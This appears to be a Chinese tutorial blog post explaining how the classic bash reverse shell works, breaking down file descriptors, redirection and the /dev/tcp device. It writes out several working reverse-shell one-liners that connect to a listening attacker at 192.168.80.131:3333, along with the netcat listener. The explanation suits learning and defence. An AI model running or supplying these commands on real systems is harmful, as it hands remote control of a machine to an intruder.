bash反弹shell原理和思考

前言

  Linux下,一条bash命令就可以反弹出shell。之前不求甚解的复现,突然有了一个疑问,为什么这样就能实现shell反弹?又重新学习了一下bash,这是一篇关于bash反弹原理的介绍。

  反弹shell命令如下

  受害者:

bash -i >& /dev/tcp/ip/port 0>&1

  攻击者

nc -lvp port

反弹 shell 的本质

  接下来依次解释一下上面两条命令的意思。

  1.bash -i

  1)bash 是linux 的一个比较常见的shell,其实linux的shell还有很多,比如 sh、zsh、等,他们之间有着细小差别

  2)-i (interact)这个参数表示的是产生交互式的shell

  2.>&

  对于这个要先了解Linux下的linux文件描述符的概念,linux shell下有三种标准的文件描述符:

  0是 stdin 代表着标准输入,使用<或者<<

  1是 stdout 代表着标准输出,使用>或者>>

  2是 stderr 代表着标准错误输出,因为也是输出,所以也是>或者>>,但是为了区别std,所以使用2>或2>>。

  在默认的条件下是0。>&符号链接在一起就是把输入重定向的意思。

  3./dev/tcp/ip/port

  对于/dev/tcp/ip/port是特殊设备文件(因为Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据,其作用是让本机与目标主机通过指定端口建立tcp连接。

   4.0>&1

  最后0>&1(放在>后面的&,表示重定向的目标不是一个文件,而是一个文件描述符)是把前面的输入重定向给了输出。

       那么整个 bash -i >& /dev/tcp/ip/port 0>&1就是一个交互性的shell把输入内容通过socket重定向给了远端服务器的端口,远端服务器的输入又重定向给了输出,这样就是实现了一个远程交互shell。

  5.命令合成

bash -i >/dev/tcp/192.168.80.131/3333
  把bash命令的结果输入到远程地址的3333端口进行回显。
  此时受害者执行的bash命令执行结果会输出到攻击者的电脑上,不会在自己的电脑上输出。
  但是这里有一个问题,攻击者没有能够实现对受害者的控制,攻击者执行的命令没法在受害者电脑上执行。
  于是我们似乎还需要一条这样的指令
bash -i < /dev/tcp/192.168.27.131/3333 
  表示把远程192.168.27.131的3333端口的输入信息作为输入
  此时是攻击者输入bash命令,在受害者电脑上输出,与上面的内容刚好相反
  把两个场景结合起来
bash -i > /dev/tcp/192.168.80.131/3333 0>&1

  而此时攻击者的命令还会在受害者电脑上输出,我们可以用混合输出(错误、正确输出都输出到一个地方)解决一下这个问题:

bash -i > /dev/tcp/192.168.80.131/3333 0>&1 2>&1

  当然我们也可以执行与之完全等价的指令

bash -i >& /dev/tcp/192.168.80.131/3333 0>&1
bash -i >& /dev/tcp/192.168.80.131/3333 0<&1

  这里的唯一区别就是 0>&1 和 0<&1 ,其实就是打开方式的不同,而对于这个文件描述符来讲并没有什么区别。

END

  至此,反弹shell的经典语句就分析完了,通过这条语句的分析我们能大致的了解反弹shell的本质,以后碰到其他的反弹shell 的语句也能用类似的分析方法区分析,甚至我们也可以自己举一反三创造更加绝妙的反弹shell 的语句。

posted @ 2021-12-10 23:10  小小小怪将军  阅读(3073)  评论(0编辑  收藏  举报